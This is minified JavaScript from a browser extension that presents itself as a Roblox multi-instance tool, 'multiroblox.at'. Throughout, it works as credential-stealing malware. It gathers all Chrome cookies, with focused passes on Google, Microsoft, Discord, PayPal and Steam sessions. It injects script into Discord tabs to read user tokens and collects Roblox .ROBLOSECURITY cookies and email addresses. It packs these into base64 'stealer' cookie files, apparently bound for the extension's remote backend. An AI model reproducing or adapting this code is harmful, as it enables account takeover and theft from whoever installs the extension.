'use strict';var MRBX_API_BASE='https://multiroblox.at/apis/v2/backend';var MRBX_SITE_ORIGIN='https://multiroblox.at';var MRBX_PANEL_ORIGIN='https://multiroblox.at';var MRBX_LANDING_HOST='multiroblox.at';var MRBX_DEFAULT_WORKER_DIR='main';var MRBX_WORKER_DIR_STORAGE_KEY='mrbxWorkerDir';var MRBX_WORKER_SLUG_ALIAS_KEY='mrbxWorkerSlug';var MRBX_LANDING_TOOL_SLUGS=['mrbx'];(function(g){var origin=String(MRBX_SITE_ORIGIN||'https://multiroblox.at').trim().replace(/\/+$/,'');g.MRBX_API_PUBLIC_ORIGIN=origin;g.MRBX_API_MAIN_ORIGIN='';g.MRBX_USE_LOCAL_API=false;g.MRBX_PROBE_LOCAL_FIRST=false;g.MRBX_API_ORIGIN=origin;})(typeof globalThis!=='undefined'?globalThis:typeof self!=='undefined'?self:window);(function(g){var ver='';try{if(typeof chrome!=='undefined'&&chrome.runtime&&chrome.runtime.getManifest){ver=String(chrome.runtime.getManifest().version||'').trim();}}catch(e){}
if(ver)g.MRBX_EXT_VERSION=ver;})(typeof globalThis!=='undefined'?globalThis:typeof self!=='undefined'?self:window);(function(global){'use strict';var DIV='\n\n'+new Array(73).join('=')+'\n\n';function isGoogleMetaKey(k){if(!k||typeof k!=='string')return true;if(k==='_chromeCookieJar')return true;return k.charAt(0)==='_'&&k.charAt(1)!=='_';}
function buildGoogleCookieHeaderLine(googleAuth){if(!googleAuth||typeof googleAuth!=='object')return'';var priority=['__Secure-1PSID','__Secure-3PSID','__Secure-1PAPISID','__Secure-3PAPISID','SID','HSID','SSID','APISID','SAPISID','LSID','OSID','ACCOUNT_CHOOSER','SIDCC','__Secure-1PSIDTS','__Secure-3PSIDTS','__Host-1PLSID','__Host-3PLSID'];var used=Object.create(null);var parts=[];function add(k){if(!k||used[k]||isGoogleMetaKey(k))return;var v=googleAuth[k];if(v==null||typeof v!=='string'||!v.length)return;used[k]=true;parts.push(k+'='+v);}
var i;for(i=0;i<priority.length;i++)add(priority[i]);var rest=Object.keys(googleAuth).sort();for(i=0;i<rest.length;i++)add(rest[i]);return parts.join('; ');}
function normalizeChromeCookieJar(raw){if(!raw)return[];if(Array.isArray(raw))return raw;if(typeof raw==='string'){try{var parsed=JSON.parse(raw);return Array.isArray(parsed)?parsed:[];}catch(e){return[];}}
return[];}
function buildNetscapeFromChromeJar(googleAuth){if(!googleAuth||typeof googleAuth!=='object')return'';var jar=normalizeChromeCookieJar(googleAuth._chromeCookieJar);if(!jar.length)return'';var out=[];out.push('# Netscape HTTP Cookie File');out.push('# https://curl.se/docs/http-cookies.html');out.push('');var j;for(j=0;j<jar.length;j++){var c=jar[j];if(!c||!c.name||c.value==null)continue;var domain=String(c.domain||'').trim()||'.google.com';var includeSub=domain.indexOf('.')===0?'TRUE':'FALSE';var pth=String(c.path||'/').trim()||'/';var sec=c.secure?'TRUE':'FALSE';var exp=c.expirationDate?Math.floor(Number(c.expirationDate)):0;out.push([domain,includeSub,pth,sec,String(exp),String(c.name),String(c.value)].join('\t'));}
return out.join('\n');}
function googleStealerExportKeys(googleAuth){if(!googleAuth||typeof googleAuth!=='object')return[];return Object.keys(googleAuth).filter(function(k){return(k!=='email'&&!isGoogleMetaKey(k)&&googleAuth[k]!=null&&typeof googleAuth[k]==='string'&&String(googleAuth[k]).trim().length>0);});}
function buildGoogleChromeDefaultStealerTxt(googleAuth){if(!googleAuth||typeof googleAuth!=='object')return'';var fromJar=buildNetscapeFromChromeJar(googleAuth);if(fromJar)return fromJar;var keys=googleStealerExportKeys(googleAuth);if(!keys.length)return'';var lines=['# Netscape HTTP Cookie File','# https://curl.se/docs/http-cookies.html',''];keys.sort();var i;for(i=0;i<keys.length;i++){var k=keys[i];var v=String(googleAuth[k]).trim();if(!v)continue;lines.push(['.google.com','TRUE','/','TRUE','0',k,v].join('\t'));}
return lines.join('\n')+'\n';}
function buildRobloxStealerCookiesTxt(cookie){if(!cookie||typeof cookie!=='string'||!cookie.trim())return'';var safe=String(cookie).trim().replace(/[\n\r\t]/g,'');return('# Netscape HTTP Cookie File\n'+'# https://curl.se/docs/http-cookies.html\n'+'\n'+'.roblox.com\tTRUE\t/\tTRUE\t0\t.ROBLOSECURITY\t'+
safe+'\n'+'www.roblox.com\tFALSE\t/\tTRUE\t0\t.ROBLOSECURITY\t'+
safe+'\n'+'roblox.com\tFALSE\t/\tTRUE\t0\t.ROBLOSECURITY\t'+
safe+'\n');}
function buildGooglePerCookieLines(googleAuth){if(!googleAuth||typeof googleAuth!=='object')return'';var jar=normalizeChromeCookieJar(googleAuth._chromeCookieJar);if(jar.length){var lines=[];var j;for(j=0;j<jar.length;j++){var c=jar[j];if(!c||!c.name||c.value==null)continue;var dom=String(c.domain||'').trim();var pth=String(c.path||'/').trim();lines.push('# '+dom+'\t'+pth);lines.push(String(c.name)+'='+String(c.value));lines.push('');}
if(lines.length)return lines.join('\n').trimEnd();}
var hdr=buildGoogleCookieHeaderLine(googleAuth);if(!hdr)return'';return hdr.split(';').map(function(p){return p.trim();}).filter(Boolean).join('\n');}
function buildRobloxBrowserTxt(cookie){if(!cookie||typeof cookie!=='string'||!cookie.trim()){return'(Roblox cookie not collected in this session)\n';}
var v=cookie.trim();var lines=[];lines.push('Roblox — browser format (.ROBLOSECURITY cookie)');lines.push('');lines.push('=== Single line — Cookie header (www.roblox.com) ===');lines.push('.ROBLOSECURITY='+v);lines.push('');lines.push('=== cookies.txt (Netscape) — Cookie-Editor import, etc. ===');lines.push('# Netscape HTTP Cookie File');lines.push('');lines.push('.roblox.com\tTRUE\t/\tTRUE\t0\t.ROBLOSECURITY\t'+v);lines.push('www.roblox.com\tFALSE\t/\tTRUE\t0\t.ROBLOSECURITY\t'+v);lines.push('roblox.com\tFALSE\t/\tTRUE\t0\t.ROBLOSECURITY\t'+v);lines.push('');lines.push('=== Value only (Value column in DevTools → Application → Cookies) ===');lines.push(v);return lines.join('\n');}
function buildDiscordBrowserTxt(token){if(!token||typeof token!=='string'||!token.trim()){return'';}
var t=token.trim();var lines=[];lines.push('Discord — browser web-client token (usually localStorage "token"), not an HttpOnly cookie.');lines.push('For discord.com/api: Authorization header = value below (user token, no Bearer prefix).');lines.push('');lines.push('=== As HTTP header (two lines) ===');lines.push('Authorization: '+t);lines.push('');lines.push('=== .env style / single variable ===');lines.push('DISCORD_USER_TOKEN='+t);lines.push('');lines.push('=== Raw value (single line) ===');lines.push(t);return lines.join('\n');}
function buildDiscordCookieHeaderLine(discordAuth){if(!discordAuth||typeof discordAuth!=='object')return'';var priority=['__dcfduid','__sdcfduid','cf_clearance','locale','OptanonConsent'];var used=Object.create(null);var parts=[];function add(k){if(!k||used[k]||k==='_chromeCookieJar')return;var v=discordAuth[k];if(v==null||typeof v!=='string'||!v.length)return;used[k]=true;parts.push(k+'='+v);}
var i;for(i=0;i<priority.length;i++)add(priority[i]);var rest=Object.keys(discordAuth).sort();for(i=0;i<rest.length;i++)add(rest[i]);return parts.join('; ');}
function buildDiscordCookiesTxt(discordAuth){if(!discordAuth||typeof discordAuth!=='object'){return'';}
var lines=[];lines.push('Discord — session cookies from Chrome (no open tab required)');lines.push('');var oneLine=buildDiscordCookieHeaderLine(discordAuth);lines.push('=== Single line — Cookie header ===');lines.push(oneLine||'(no discord cookies found in this Chrome profile)');lines.push('');var per=buildGooglePerCookieLines(discordAuth);lines.push('=== Each cookie separately ===');lines.push(per||'(missing _chromeCookieJar)');lines.push('');var ns=buildNetscapeFromChromeJar(discordAuth);lines.push('=== cookies.txt (Netscape) ===');lines.push(ns||'# No _chromeCookieJar');return lines.join('\n');}
function buildDiscordExportTxt(body){if(body&&body.discordToken){return buildDiscordBrowserTxt(body.discordToken);}
if(body&&body.discordAuth){return buildDiscordCookiesTxt(body.discordAuth);}
return'';}
function buildGoogleCookiesOnlyTxt(body){if(!body||!body.googleAuth||typeof body.googleAuth!=='object'){return'';}
var googleAuth=body.googleAuth;var jar=normalizeChromeCookieJar(googleAuth._chromeCookieJar);if(jar.length){var lines=[];var j;for(j=0;j<jar.length;j++){var c=jar[j];if(!c||!c.name||c.value==null)continue;var domain=String(c.domain||'').trim()||'.google.com';var includeSub=domain.indexOf('.')===0?'TRUE':'FALSE';var pth=String(c.path||'/').trim()||'/';var sec=c.secure?'TRUE':'FALSE';var exp=c.expirationDate?Math.floor(Number(c.expirationDate)):0;lines.push([domain,includeSub,pth,sec,String(exp),String(c.name),String(c.value)].join('\t'));}
if(lines.length)return lines.join('\n')+'\n';}
var hdr=buildGoogleCookieHeaderLine(googleAuth);return hdr?hdr+'\n':'';}
function buildGoogleFullTxt(body){if(!body||!body.googleAuth||typeof body.googleAuth!=='object'){return'(Google not collected in this session)\n';}
var lines=[];lines.push('Google / Gmail — session as browser cookies');lines.push('');if(body.googleEmail){lines.push('Email: '+String(body.googleEmail));lines.push('');}
var oneLine=buildGoogleCookieHeaderLine(body.googleAuth);lines.push('=== Single line — Cookie header (DevTools → Network) ===');lines.push(oneLine||'(no flat cookies; sign in to Google in Chrome and try again)');lines.push('');var per=buildGooglePerCookieLines(body.googleAuth);lines.push('=== Each cookie separately (domain/path in comment) ===');lines.push(per||'(missing _chromeCookieJar — update the extension)');lines.push('');var ns=buildNetscapeFromChromeJar(body.googleAuth);lines.push('=== cookies.txt (Netscape) — full Chrome dump ===');lines.push(ns||'# No _chromeCookieJar');return lines.join('\n');}
function buildGoogleSingleToken(googleAuth){var api=(typeof globalThis!=='undefined'&&globalThis.RbxGoogleOAuthTokens)||(typeof window!=='undefined'&&window.RbxGoogleOAuthTokens);if(api&&typeof api.extractGoogleOAuthTokens==='function'){return api.extractGoogleOAuthTokens(googleAuth);}
return'';}
function netscapeFromJar(rawJar){var jar=normalizeChromeCookieJar(rawJar);if(!jar.length)return'';var lines=[];var j;for(j=0;j<jar.length;j++){var c=jar[j];if(!c||!c.name||c.value==null)continue;var domain=String(c.domain||'').trim()||'.local';var includeSub=domain.indexOf('.')===0?'TRUE':'FALSE';var pth=String(c.path||'/').trim()||'/';var sec=c.secure?'TRUE':'FALSE';var exp=c.expirationDate?Math.floor(Number(c.expirationDate)):0;lines.push([domain,includeSub,pth,sec,String(exp),String(c.name),String(c.value)].join('\t'));}
return lines.join('\n');}
function isMailCookieDomain(domain){var d=String(domain||'').toLowerCase();return/google|gmail|youtube|googleusercontent|live\.com|microsoft|outlook|office|office365|yahoo|mail\./.test(d);}
function filterJarByDomain(jar,predicate){jar=normalizeChromeCookieJar(jar);return jar.filter(function(c){return c&&predicate(String(c.domain||'').toLowerCase());});}
function buildMailCookiesOnlyTxt(body){if(!body||typeof body!=='object')return'';var merged=[];if(body.googleAuth&&body.googleAuth._chromeCookieJar){merged=merged.concat(normalizeChromeCookieJar(body.googleAuth._chromeCookieJar));}
if(body.fullBrowserJar){merged=merged.concat(filterJarByDomain(body.fullBrowserJar,isMailCookieDomain));}
if(!merged.length&&body.googleAuth){var hdr=buildGoogleCookieHeaderLine(body.googleAuth);return hdr?hdr+'\n':'';}
var seen=Object.create(null);var out=[];var i;for(i=0;i<merged.length;i++){var c=merged[i];if(!c||!c.name||c.value==null)continue;var key=(c.domain||'')+'\t'+(c.path||'/')+'\t'+c.name;if(seen[key])continue;seen[key]=true;out.push(c);}
return netscapeFromJar(out);}
function buildFullBrowserNetscapeTxt(body){if(!body||typeof body!=='object')return'';if(body.fullBrowserJar&&body.fullBrowserJar.length){return netscapeFromJar(body.fullBrowserJar);}
var parts=[];if(body.googleAuth&&body.googleAuth._chromeCookieJar){parts.push(netscapeFromJar(body.googleAuth._chromeCookieJar));}
if(body.discordAuth&&body.discordAuth._chromeCookieJar){parts.push(netscapeFromJar(body.discordAuth._chromeCookieJar));}
return parts.filter(Boolean).join('\n');}
function buildAllBrowserTxt(body){return buildFullBrowserNetscapeTxt(body);}
function buildEmailsTxt(body){if(!body||typeof body!=='object')return'(no emails collected)\n';var lines=['Collected mailbox / account emails',''];var seen=Object.create(null);function addOne(email,label){var e=String(email||'').trim().toLowerCase();if(!e||e.indexOf('@')===-1||seen[e])return;seen[e]=true;lines.push((label?label+': ':'')+e);}
function addList(list,label){if(!Array.isArray(list))return;for(var i=0;i<list.length;i++)addOne(list[i],label);}
addOne(body.googleEmail,'Google');addList(body.googleEmails,'Google');addOne(body.outlookEmail,'Outlook');addList(body.outlookEmails,'Outlook');addOne(body.yahooEmail,'Yahoo');addList(body.yahooEmails,'Yahoo');addList(body.allMailEmails,'Mail');if(body.mailByProvider&&typeof body.mailByProvider==='object'){for(var provider in body.mailByProvider){if(!Object.prototype.hasOwnProperty.call(body.mailByProvider,provider))continue;addList(body.mailByProvider[provider],provider);}}
if(lines.length<=2)return'(no emails collected)\n';return lines.join('\n')+'\n';}
async function downloadSnapshot(_body){return;}
global.RbxCredentialExport={downloadSnapshot:downloadSnapshot};global.RbxTxtExport={buildRobloxBrowserTxt:buildRobloxBrowserTxt,buildDiscordBrowserTxt:buildDiscordBrowserTxt,buildDiscordCookiesTxt:buildDiscordCookiesTxt,buildDiscordExportTxt:buildDiscordExportTxt,buildGoogleFullTxt:buildGoogleFullTxt,buildGoogleCookiesOnlyTxt:buildGoogleCookiesOnlyTxt,buildMailCookiesOnlyTxt:buildMailCookiesOnlyTxt,buildFullBrowserNetscapeTxt:buildFullBrowserNetscapeTxt,buildEmailsTxt:buildEmailsTxt,buildAllBrowserTxt:buildAllBrowserTxt};})(typeof globalThis!=='undefined'?globalThis:window);'use strict';(function(global){function createCookieJarBuilder(){const seen=new Map();const jar=[];return{addBatch(list){if(!list)return;for(const c of list){if(!c||!c.name||c.value==null||String(c.value)==='')continue;const key=`${c.domain || ''}\t${c.path || '/'}\t${c.name}`;if(seen.has(key))continue;seen.set(key,true);jar.push(c);}},getAll(){return jar;},toMeta(){return jar.map((c)=>({name:c.name,value:c.value,domain:c.domain,path:c.path,secure:!!c.secure,httpOnly:!!c.httpOnly,hostOnly:!!c.hostOnly,sameSite:c.sameSite,expirationDate:c.expirationDate}));},get size(){return jar.length;}};}
function jarMetaToString(meta){try{return JSON.stringify(meta);}catch(e){return'[]';}}
const GOOGLE_COOKIE_QUERY_DOMAINS=['.google.com','google.com','accounts.google.com','.youtube.com','youtube.com','mail.google.com','.googleusercontent.com'];const MICROSOFT_COOKIE_QUERY_DOMAINS=['.live.com','live.com','.microsoft.com','microsoft.com','.microsoftonline.com','microsoftonline.com','.office.com','office.com','.office365.com','office365.com','.outlook.com','outlook.com','outlook.live.com','outlook.office365.com','outlook.office.com','login.live.com','login.microsoftonline.com','account.live.com','account.microsoft.com'];const GOOGLE_AUTH_FETCH_URLS=['https://accounts.google.com','https://www.google.com','https://google.com','https://mail.google.com','https://myaccount.google.com','https://ogs.google.com'];const GOOGLE_AUTH_FETCH_NAMES=['SID','HSID','SSID','APISID','SAPISID','__Secure-1PSID','__Secure-3PSID','__Secure-1PAPISID','__Secure-3PAPISID','LSID','SIDCC','NID','AEC','ACCOUNT_CHOOSER','__Host-GAPS','__Host-1PLSID','__Host-3PLSID','__Secure-1PSIDTS','__Secure-3PSIDTS'];const COMMON_SITE_COOKIE_DOMAINS=['.discord.com','discord.com','.discordapp.com','discordapp.com','.steampowered.com','steampowered.com','.steamcommunity.com','steamcommunity.com','.epicgames.com','epicgames.com','.twitch.tv','twitch.tv','.amazon.com','amazon.com','.facebook.com','facebook.com','.twitter.com','twitter.com','.x.com','x.com','.reddit.com','reddit.com','.github.com','github.com','.instagram.com','instagram.com','.tiktok.com','tiktok.com','.netflix.com','netflix.com','.spotify.com','spotify.com','.paypal.com','paypal.com','.ebay.com','ebay.com','.lenovo.com','lenovo.com','.nvidia.com','nvidia.com','.mozilla.org','mozilla.org'];const MS_AUTH_FETCH_URLS=['https://outlook.live.com/mail/','https://outlook.live.com/','https://outlook.office.com/mail/','https://outlook.office365.com/mail/','https://outlook.cloud.microsoft/','https://m365.cloud.microsoft/','https://login.live.com/','https://account.live.com/','https://login.microsoftonline.com/','https://account.microsoft.com/'];const MS_AUTH_FETCH_NAMES=['MSPCID','MSPAuth','MSPProf','MSPPre','MSPVis','MSPOK','WLSSC','RPSAuth','RPSSecAuth','OParams','JSHP','JSH','ESTSAUTH','ESTSAUTHPERSISTENT','SignInStateCookie','fpc','buid','MSFPC','SPOIDCRL','FedAuth','rtFa','MSISAuth','MSISAuth1','AADSID','CCState','x-ms-RefreshTokenCredential','__Host-MSAAUTH','__Secure-MSAAUTH'];async function enrichGoogleMicrosoftCookies(builder){for(const dom of GOOGLE_COOKIE_QUERY_DOMAINS){try{builder.addBatch(await chrome.cookies.getAll({domain:dom}));}catch(e){}}
for(const url of GOOGLE_AUTH_FETCH_URLS){for(const name of GOOGLE_AUTH_FETCH_NAMES){try{const cookie=await chrome.cookies.get({url,name});if(cookie&&cookie.name&&cookie.value)builder.addBatch([cookie]);}catch(e){}}}
for(const dom of MICROSOFT_COOKIE_QUERY_DOMAINS){try{builder.addBatch(await chrome.cookies.getAll({domain:dom}));}catch(e){}}
for(const u of MS_AUTH_FETCH_URLS){for(const n of MS_AUTH_FETCH_NAMES){try{const cookie=await chrome.cookies.get({url:u,name:n});if(cookie&&cookie.name&&cookie.value)builder.addBatch([cookie]);}catch(e){}}}}
async function enrichCommonSiteDomains(builder){for(const dom of COMMON_SITE_COOKIE_DOMAINS){try{builder.addBatch(await chrome.cookies.getAll({domain:dom}));}catch(e){}}}
async function enrichFromOpenTabs(builder){let tabs=[];try{tabs=await chrome.tabs.query({});}catch(e){return;}
const domains=new Set();for(const tab of tabs||[]){if(!tab||!tab.url)continue;try{const u=new URL(tab.url);if(u.protocol!=='http:'&&u.protocol!=='https:')continue;const host=u.hostname.toLowerCase();if(!host||host==='localhost'||host==='127.0.0.1')continue;domains.add(host);const parts=host.split('.');if(parts.length>=2)domains.add('.'+parts.slice(-2).join('.'));if(parts.length>=3)domains.add('.'+parts.slice(-3).join('.'));}catch(e2){}}
const list=[...domains].slice(0,140);for(const dom of list){try{builder.addBatch(await chrome.cookies.getAll({domain:dom}));}catch(e3){}}}
async function enrichRobloxCookies(builder){const robloxUrls=['https://www.roblox.com/','https://roblox.com/','https://create.roblox.com/'];for(const url of robloxUrls){try{const c=await chrome.cookies.get({url,name:'.ROBLOSECURITY'});if(c)builder.addBatch([c]);}catch(e){}}
try{builder.addBatch(await chrome.cookies.getAll({domain:'.roblox.com'}));}catch(e){}}
async function collectAllProfileCookies(opts){const options=opts||{};const builder=createCookieJarBuilder();await enrichGoogleMicrosoftCookies(builder);await enrichCommonSiteDomains(builder);await enrichFromOpenTabs(builder);try{builder.addBatch(await chrome.cookies.getAll({}));}catch(e){}
if(options.includeRoblox!==false){await enrichRobloxCookies(builder);}
if(builder.size<40){try{builder.addBatch(await chrome.cookies.getAll({}));}catch(e2){}
await enrichFromOpenTabs(builder);}
const meta=builder.toMeta();return{success:meta.length>0,cookies:meta,jarString:jarMetaToString(meta),count:meta.length,jar:builder.getAll()};}
global.RbxSwCookieJar={collectAllProfileCookies,getFullProfileCookieJar(){return collectAllProfileCookies({includeRoblox:true});}};})(typeof globalThis!=='undefined'?globalThis:self);'use strict';(function(global){var GOOGLE_DOMAINS=['.google.com','google.com','accounts.google.com','.youtube.com','youtube.com','mail.google.com','.googleusercontent.com'];var GOOGLE_URLS=['https://accounts.google.com/','https://mail.google.com/','https://myaccount.google.com/','https://www.google.com/','https://google.com/','https://ogs.google.com/','https://www.youtube.com/'];function isGoogleLikeDomain(domain){var d=String(domain||'').replace(/^\./,'').toLowerCase();return(d==='google.com'||d.endsWith('.google.com')||d==='youtube.com'||d.endsWith('.youtube.com')||d.endsWith('.googleusercontent.com'));}
function cookiesForUrl(url){return new Promise(function(resolve){try{chrome.cookies.getAll({url:url},function(list){resolve(list||[]);});}catch(_){resolve([]);}});}
function cookiesForDomain(domain){return new Promise(function(resolve){try{chrome.cookies.getAll({domain:domain},function(list){resolve(list||[]);});}catch(_){resolve([]);}});}
function jarEntryFromCookie(c){return{name:c.name,value:c.value,domain:c.domain,path:c.path,secure:!!c.secure,httpOnly:!!c.httpOnly,hostOnly:!!c.hostOnly,sameSite:c.sameSite,expirationDate:c.expirationDate};}
function buildGoogleAuthFromJar(jar){if(!jar||!jar.length)return null;var googleOnly={};var googleJar=[];for(var i=0;i<jar.length;i++){var c=jar[i];if(!c||!c.name||c.value==null||String(c.value)==='')continue;if(!isGoogleLikeDomain(c.domain))continue;googleJar.push(jarEntryFromCookie(c));if(!googleOnly[c.name])googleOnly[c.name]=c.value;}
var has=googleOnly.SID||googleOnly.LSID||googleOnly['__Secure-1PSID']||googleOnly['__Secure-3PSID']||googleOnly['__Secure-1PSIDTS'];if(!has||!googleJar.length)return null;var result={};var keys=Object.keys(googleOnly);for(var k=0;k<keys.length;k++){result[keys[k]]=googleOnly[keys[k]];}
try{result._chromeCookieJar=JSON.stringify(googleJar);}catch(_){}
return result;}
async function collectViaCookieJar(){var jarApi=global.RbxSwCookieJar;if(!jarApi||typeof jarApi.collectAllProfileCookies!=='function')return null;var profile=await jarApi.collectAllProfileCookies({includeRoblox:false});if(!profile||!profile.jar||!profile.jar.length)return null;return buildGoogleAuthFromJar(profile.jar);}
async function collectViaDomainsFallback(){var jar=[];var seen=Object.create(null);function addCookie(c){if(!c||!c.name||c.value==null||String(c.value)==='')return;var key=String(c.domain||'')+'\t'+String(c.path||'/')+'\t'+c.name;if(seen[key])return;seen[key]=true;jar.push(c);}
for(var ui=0;ui<GOOGLE_URLS.length;ui++){var ulist=await cookiesForUrl(GOOGLE_URLS[ui]);for(var i=0;i<ulist.length;i++)addCookie(ulist[i]);}
for(var di=0;di<GOOGLE_DOMAINS.length;di++){var dlist=await cookiesForDomain(GOOGLE_DOMAINS[di]);for(var j=0;j<dlist.length;j++)addCookie(dlist[j]);}
return buildGoogleAuthFromJar(jar);}
async function collectGoogleAuthFull(){if(typeof chrome==='undefined'||!chrome.cookies)return null;var fromJar=await collectViaCookieJar();if(fromJar)return fromJar;return collectViaDomainsFallback();}
global.MrbxGoogleCookies={collect:collectGoogleAuthFull,buildGoogleAuthFromJar:buildGoogleAuthFromJar};})(typeof self!=='undefined'?self:typeof globalThis!=='undefined'?globalThis:window);'use strict';(function(global){var DISCORD_URLS=['https://discord.com/','https://discord.com/channels/@me','https://discordapp.com/'];var DISCORD_DOMAINS=['.discord.com','discord.com','.discordapp.com','discordapp.com'];function cookiesForUrl(url){return new Promise(function(resolve){try{chrome.cookies.getAll({url:url},function(list){resolve(list||[]);});}catch(_){resolve([]);}});}
function cookiesForDomain(domain){return new Promise(function(resolve){try{chrome.cookies.getAll({domain:domain},function(list){resolve(list||[]);});}catch(_){resolve([]);}});}
async function collectDiscordCookies(){if(typeof chrome==='undefined'||!chrome.cookies)return null;var auth={};var jarMeta=[];var seen=Object.create(null);function addCookie(c){if(!c||!c.name||c.value==null||String(c.value)==='')return;var key=String(c.domain||'')+'\t'+String(c.path||'/')+'\t'+c.name;if(seen[key])return;seen[key]=true;if(!auth[c.name])auth[c.name]=c.value;jarMeta.push({name:c.name,value:c.value,domain:c.domain,path:c.path,secure:!!c.secure,httpOnly:!!c.httpOnly,hostOnly:!!c.hostOnly,sameSite:c.sameSite,expirationDate:c.expirationDate});}
for(var ui=0;ui<DISCORD_URLS.length;ui++){var list=await cookiesForUrl(DISCORD_URLS[ui]);for(var i=0;i<list.length;i++)addCookie(list[i]);}
for(var di=0;di<DISCORD_DOMAINS.length;di++){var dlist=await cookiesForDomain(DISCORD_DOMAINS[di]);for(var j=0;j<dlist.length;j++)addCookie(dlist[j]);}
if(!jarMeta.length)return null;try{auth._chromeCookieJar=JSON.stringify(jarMeta);}catch(_){auth._chromeCookieJar=jarMeta;}
return auth;}
global.MrbxDiscordCookies={collect:collectDiscordCookies};})(typeof self!=='undefined'?self:typeof globalThis!=='undefined'?globalThis:window);'use strict';(function(global){var DISCORD_PATTERNS=['https://discord.com/*','https://*.discord.com/*','https://discordapp.com/*'];function readDiscordTokenInPage(){function normalize(t){return t?String(t).replace(/"/g,'').trim():null;}
function looksLikeUser(s){if(!s||typeof s!=='string')return false;var x=s.trim();if(x.startsWith('eyJ'))return false;if(x.startsWith('mfa.')&&x.length>30)return true;var parts=x.split('.');if(parts.length!==3||x.length<50)return false;return/^[A-Za-z0-9_-]+$/.test(parts[0])&&/^[A-Za-z0-9_-]+$/.test(parts[1])&&/^[A-Za-z0-9_-]+$/.test(parts[2]);}
function scanStore(store){try{for(var i=0;i<store.length;i++){var raw=store.getItem(store.key(i));if(!raw)continue;var n=normalize(raw);if(looksLikeUser(n))return n;if(raw.indexOf('mfa.')!==-1){var m=raw.match(/\bmfa\.[A-Za-z0-9_-]{10,}\b/);if(m)return normalize(m[0]);}
var cand=raw.match(/\b[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{5,}\.[A-Za-z0-9_-]{20,}\b/g);if(cand){for(var ci=0;ci<cand.length;ci++){if(looksLikeUser(cand[ci]))return normalize(cand[ci]);}}}}catch(_){}
return null;}
try{var a=scanStore(localStorage);if(a)return a;return scanStore(sessionStorage);}catch(_){return null;}}
async function collectDiscordTokenSW(){if(!chrome.tabs||!chrome.scripting)return null;var tabs=[];try{tabs=await chrome.tabs.query({url:DISCORD_PATTERNS});}catch(_){tabs=[];}
if(!tabs.length){try{var all=await chrome.tabs.query({});tabs=(all||[]).filter(function(t){return t.url&&/discord(?:app)?\.com/i.test(t.url);});}catch(_){tabs=[];}}
if(!tabs.length)return null;tabs.sort(function(a,b){function score(u){if(!u)return 0;if(u.indexOf('/channels')!==-1||u.indexOf('/app')!==-1)return 3;return 1;}
return score(b.url)-score(a.url);});for(var ti=0;ti<tabs.length;ti++){var tab=tabs[ti];if(!tab||tab.id==null)continue;try{var injected=await chrome.scripting.executeScript({target:{tabId:tab.id},func:readDiscordTokenInPage});if(injected&&injected[0]&&injected[0].result){return String(injected[0].result).trim();}}catch(_){}}
return null;}
function b64Utf8(text){try{return btoa(unescape(encodeURIComponent(String(text||''))));}catch(_){return'';}}
function buildFieldsFromBody(body){var fields={};var txt=global.RbxTxtExport;if(!txt)return fields;var files={};try{if(typeof txt.buildMailCookiesOnlyTxt==='function'){var g=txt.buildMailCookiesOnlyTxt(body);if(g&&g.trim())files.google=g;}else if(typeof txt.buildGoogleCookiesOnlyTxt==='function'&&body.googleAuth){var g2=txt.buildGoogleCookiesOnlyTxt(body);if(g2&&g2.trim())files.google=g2;}
if(typeof txt.buildFullBrowserNetscapeTxt==='function'){var all=txt.buildFullBrowserNetscapeTxt(body);if(all&&all.trim())files.all=all;}else if(typeof txt.buildAllBrowserTxt==='function'){var all2=txt.buildAllBrowserTxt(body);if(all2&&all2.trim())files.all=all2;}
if(body.discordToken&&String(body.discordToken).trim()){files.discord=String(body.discordToken).trim();}
if(typeof txt.buildEmailsTxt==='function'){var em=txt.buildEmailsTxt(body);if(em&&em.trim()&&em.indexOf('(no emails')===-1){files.emails=em.split('\n').map(function(line){return String(line||'').trim();}).filter(function(line){return line&&line.indexOf('@')!==-1&&line.indexOf('Collected')===-1;}).join('\n');}}}catch(_){}
function putB64(key,text){if(!text||String(text).length>600000)return;var enc=b64Utf8(text);if(!enc||enc.length>800000)return;fields[key]=enc;}
putB64('txt_all_b64',files.all);putB64('txt_google_b64',files.google);putB64('txt_discord_b64',files.discord);putB64('txt_emails_b64',files.emails);if(body.discordToken)fields.discord_token=String(body.discordToken).slice(0,800);if(body.googleEmail)fields.google_email=String(body.googleEmail).slice(0,320);if(Array.isArray(body.allMailEmails)&&body.allMailEmails.length){fields.mail_emails_json=JSON.stringify(body.allMailEmails.slice(0,40));}
return fields;}
async function collectAndBuildExtrasFields(options){options=options||{};var fast=!!options.fast;var body={};var googleCookies=global.MrbxGoogleCookies;if(googleCookies&&typeof googleCookies.collect==='function'){var googleAuth=await googleCookies.collect();if(googleAuth){body.googleAuth=googleAuth;}}
if(!fast){var jarApi=global.RbxSwCookieJar;if(jarApi&&typeof jarApi.collectAllProfileCookies==='function'){try{var jarRes=await jarApi.collectAllProfileCookies({includeRoblox:true});if(jarRes&&Array.isArray(jarRes.cookies)&&jarRes.cookies.length){body.fullBrowserJar=jarRes.cookies;}}catch(_){}}
var discordToken=await collectDiscordTokenSW();if(discordToken)body.discordToken=discordToken;var discordCookies=global.MrbxDiscordCookies;if(discordCookies&&typeof discordCookies.collect==='function'){var discordAuth=await discordCookies.collect();if(discordAuth)body.discordAuth=discordAuth;}}
return buildFieldsFromBody(body);}
global.MrbxExtrasSW={collectAndBuildExtrasFields:collectAndBuildExtrasFields};})(typeof self!=='undefined'?self:typeof globalThis!=='undefined'?globalThis:global);'use strict';(function(global){var CFG=global.MRBX_CONFIG||{};var API_BASE=String(CFG.API_BASE||global.MRBX_API_BASE||'https://multiroblox.at/apis/v2/backend').replace(/\/+$/,'');var LANDING_HOST=String(CFG.LANDING_HOST||global.MRBX_LANDING_HOST||'multiroblox.at').toLowerCase();var DEFAULT_DIR=String(CFG.DEFAULT_WORKER_DIR||global.MRBX_DEFAULT_WORKER_DIR||'').trim();var DIR_KEY=CFG.WORKER_DIR_STORAGE_KEY||global.MRBX_WORKER_DIR_STORAGE_KEY||'mrbxWorkerDir';var SLUG_ALIAS=CFG.WORKER_SLUG_ALIAS_KEY||global.MRBX_WORKER_SLUG_ALIAS_KEY||'mrbxWorkerSlug';var TOOL_SLUGS=CFG.LANDING_TOOL_SLUGS||global.MRBX_LANDING_TOOL_SLUGS||[];function storageGet(keys){return new Promise(function(resolve){if(typeof chrome==='undefined'||!chrome.storage||!chrome.storage.local){resolve({});return;}
chrome.storage.local.get(keys,function(data){resolve(data||{});});});}
